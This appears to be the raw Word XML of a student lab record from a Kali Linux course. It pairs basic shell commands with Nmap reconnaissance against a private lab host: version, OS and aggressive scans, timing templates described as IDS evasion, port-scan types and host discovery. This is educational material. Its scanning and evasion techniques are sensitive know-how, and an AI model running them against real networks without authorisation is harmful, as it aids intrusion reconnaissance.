        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FF4056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0953D0F4" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To execute and display the results of the touch, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands for file creation, path checking, and file download.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F83CC79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2E4821C3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20440D95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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to display the current working directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC9DB8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touch empty_file.txt to create an empty file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F6BD8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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://www.kali.org to download a web page over HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD2B465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Verify the downloaded file with ls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F6F5E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46641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0397A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pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="67E9A60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/home/kali/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lab_files</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="09926668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touch empty_file.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="506F68CA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ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D13F262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empty_file.txt  renamed_notes.txt</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6146941C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wget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https://www.kali.org</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BACCF5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--2026-08-03 11:18:40</w:t>
            </w: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 https://www.kali.org/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5F9AF5E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Resolving www.kali.org...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56D95D4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Connecting to www.kali.org... connected.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BDCB1B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 request sent, awaiting response... 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C9A2DB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Length: 51204 (50K) [text/html]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11D8B1E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Saving to: 'index.html'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="412DBE6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index.html          100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===================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&gt;]  50.00K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--.-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KB/s   in 0.05s</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12EDC32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2026-08-03 11:18:41 (980 KB/s) - 'index.html' saved [51204/51204]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09590228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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, touch, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands were executed, confirming the working directory, creating a new file, and downloading a page over HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B47CB8" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45215D8F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7: Execution of cd, cp, and ls Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0F121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5934C4DB" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To execute and display the results of the cd, cp, and ls commands for directory navigation and file copying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5870E59E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7E25B2F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075096E3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cd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to move up one directory level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B9496C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cp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lab_files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/renamed_notes.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lab_files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/backup_notes.txt to copy a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14428E9A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cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lab_files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to move back into the directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58655FAB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ls to confirm both the original and copied files are present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44140607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2FEB6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380B64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cd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..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3419D4CB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cp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/renamed_notes.txt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/backup_notes.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E0544F0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cd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</w:p>
          <w:p w14:paraId="0B329930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lab_files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ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F2B6C6D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backup_notes.txt  empty_file.txt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renamed_notes.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="760C9347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The cd, cp, and ls commands were used to navigate directories and duplicate a file, confirming both the original and the copy existed afterward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7B08AC" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A088E52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8: Nmap Service Version Detection, Aggressive Scan, and OS Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55489F7A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5E1AF44B" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To use Nmap's -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, -A, and -O options to detect running service versions, perform an aggressive scan, and identify the target's operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1ACD71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5E484CFA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16BE065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 version-detection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sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1306D4B6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an OS-detection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-O 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081B0311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 an aggressive scan (combines -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, -O, script scan, and traceroute):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-A 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F515874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Compare the additional detail (service banners, OS guess) each option returns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBB133D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7F453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DCE5F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sV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192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D42E9B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PORT    STATE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  VERSION</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4B0D6EE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ftp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vsftpd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2.3.4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D64175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ssh      OpenSSH 7.9p1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63E1324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80/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http     Apache httpd 2.4.41</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5152084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313B699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-O 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3650F7A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Running: Linux 5.X</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B38B27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OS details: Linux 5.4 - 5.15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2923EE1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Network Distance: 1 hop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="627237F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2DA7E89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-A 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23352C4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PORT    STATE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  VERSION</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="49EF955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ftp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vsftpd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2.3.4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0740779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ssh      OpenSSH 7.9p1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F384E3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80/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http     Apache httpd 2.4.41</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E1D91E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|_http-title: Apache2 Default Page</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F7464A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OS details: Linux 5.4 - 5.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C517270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Nmap's version-detection, OS-detection, and aggressive-scan options were used, revealing service banners and an operating-system estimate for the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9FF525" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="428C9111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9: Nmap Timing: Polite and Normal IDS Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A60023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6C5FF2B6" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To use Nmap's polite (-T2) and normal (-T3) timing templates to reduce scan visibility to intrusion detection systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EF3291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6E73C7A7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6ABF4FD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 polite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-T2 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48670D2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 normal-speed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-T3 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34714CEB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Compare the elapsed scan time and packet rate between the two templates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A0977A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Note the trade-off between stealth and speed for IDS evasion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E027CC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4E13C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6375FB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-T2 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CB1F2D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PORT    STATE SERVICE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61BE78C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ftp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="632C2D2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ssh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30CC25B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80/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http</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22D0292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12.84 seconds</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C6F20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93F562D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-T3 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DD9C43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PORT    STATE SERVICE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3648E02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ftp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24CBE2CE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ssh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CC8B9E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80/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http</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B8F935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4.71 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="679BCE03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The polite and normal timing templates were compared; -T2 took noticeably longer than -T3, illustrating the reduced footprint used for IDS evasion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3B318A" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE85CE9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10: Execution of free, sort, and history Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7941586B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5AE9F1C9" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To execute and display the results of the free, sort, and history commands for monitoring memory usage and reviewing command history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEDA208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466DE9F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01B5998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free -h to display memory usage in human-readable form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECE8523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sort sample.txt to sort the lines of a text file alphabetically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D66E0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Run: history to review previously executed commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1448CD81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6C197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008D1A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free -h</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="583203F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total        used        free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shared  buff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/cache   available</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11CF460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Mem:            3.8Gi       612Mi       2.4Gi        45Mi       780Mi        3.0Gi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57BDEA2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Swap:           1.0Gi          0B       1.0Gi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BCBFCA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BA89EDC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sort sample.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EE331FE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discard    9/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0D01AF7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      7/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14B57267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tcpmux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0FF28AC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6C3827B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history</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7571A8BC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1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mkdir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lab_files</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="24631E66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  cd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lab_files</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0991EA54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3  cat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&gt; notes.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DD73FA1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4  ls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-l</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05B0D64A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5  free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-h</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28EA761B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Memory usage, sorted file content, and the command history were displayed using the free, sort, and history commands respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C1BB41" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34399776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11: Nmap Timing: Aggressive and Insane Speed Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20746475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2C3EA722" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To use Nmap's aggressive (-T4) and insane (-T5) timing templates to maximise scan speed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9E99E4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3182B82A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7EDFF24E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an aggressive-speed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-T4 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705F8C6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an insane-speed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-T5 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C992A66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Compare the elapsed scan time against the polite and normal templates from Experiment 9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFC57B5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Note the risk of dropped packets at higher speeds on unstable networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBD8D9F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7C2AE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EF08EA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-T4 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C35F87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PORT    STATE SERVICE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D899FA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ftp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33BED33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ssh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ABA918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80/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http</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="226D644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1.83 seconds</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59AD8E4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238FFE1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-T5 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FBD47C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PORT    STATE SERVICE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B76C26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ftp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="460CDCF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ssh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7685807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80/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http</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A9D35EE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0.96 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14AE355F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The aggressive and insane timing templates completed the scan in under two seconds each, confirming the expected speed gain over the polite/normal templates used in Experiment 9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A42387A" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D9EA6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12: Port Scanning Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433C29BC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7619EC8E" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To use Nmap to identify open, closed, and filtered ports on a target host using different scan types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B950CEE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001DDE5B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14E7FF03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 SYN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sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232EC12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 TCP connect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sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B5AE33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an ACK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192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE8B82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 UDP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sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EEE53A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Compare the port states reported by each scan type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDCA92D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5A4AC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530BA6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192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34F2B32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Starting Nmap 7.94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 https://nmap.org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) at 2026-08-03 10:12 IST</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DCF9C7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scan report for 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00B224A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 is up (0.00042s latency).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D35B11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Not shown: 995 closed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ports (reset)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FD80B6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PORT    STATE SERVICE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E39AB3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ftp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4569ECB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ssh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BAB07DE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80/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open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http</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B598BE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139/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open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netbios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-ssn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7558852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445/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open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-ds</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FF9863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4.71 seconds</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="029E731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3B269BD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sT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192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E8F417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PORT   STATE SERVICE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18CF5FD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  ftp</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="669CFE1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  ssh</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2FCBC42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80/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  http</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="37307D7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6.38 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00D398F9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All four scan types (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, -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>, -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) were run successfully, and the difference in speed and reported port state between them was observed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A03EC8" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E954C96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13: Host Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A7D1D6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3129D330" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To identify live hosts on a network using Nmap's host-discovery options before running a full port scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C97A71D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50F2D2BC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Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.1 to skip discovery and assume the host is up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8B4FEA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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.1 for a discovery-only (no port scan) scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118580C7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-PR 192.168.1.1 for ARP-based discovery on the local subnet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AA11A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-n 192.168.1.1 to disable DNS resolution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7533AE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Compare response times across the methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574C4A2A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281B3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C610B1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sn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192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D7B0B3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Starting Nmap 7.94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 https://nmap.org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) at 2026-08-03 10:20 IST</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5469868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scan report for 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F5A010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 is up (0.00038s latency).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AE6D85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0.15 seconds</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3506574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F4DFD67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-PR 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DFF395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scan report for 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4348F35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 is up (0.00021s latency).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60AD086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MAC Address: 08:00:27:4E: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66:A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 (Oracle VirtualBox)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69276A0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0.08 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
